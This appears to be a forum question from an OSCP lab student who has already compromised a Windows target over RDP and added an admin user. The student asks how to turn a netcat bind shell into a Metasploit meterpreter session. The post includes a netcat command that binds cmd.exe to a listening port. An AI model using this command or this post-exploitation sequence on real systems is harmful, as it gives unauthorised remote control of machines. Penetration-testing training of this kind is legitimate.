Using msf to connect to netcat listener and shell_to_meterperter
I've been trying for hours and failing to do something that should be simple!
I have a box w/ admin (taking OSCP - nothing illegal). I used an RDP exploit, got a shell, added a user, put user in administrators group and as I sit I currently am on an rdesktop with an administrator.
Given - TARGET -, I have an admin shell and access to rdesktop. Have uploaded nc.exe
KALI - My machine -
What I am trying to do is open a LISTENING port on the TARGET ... c:\nc -lvp 9999 -e c:\windows\system32\cmd.exe
...connect to that open port from my KALI box while using metasploit framework. I can connect using nc 9999, but I can't make that connection a metasploit session.
Then turn this connection into a meterpreter session using post/multi/manage/shell_to_meterpreter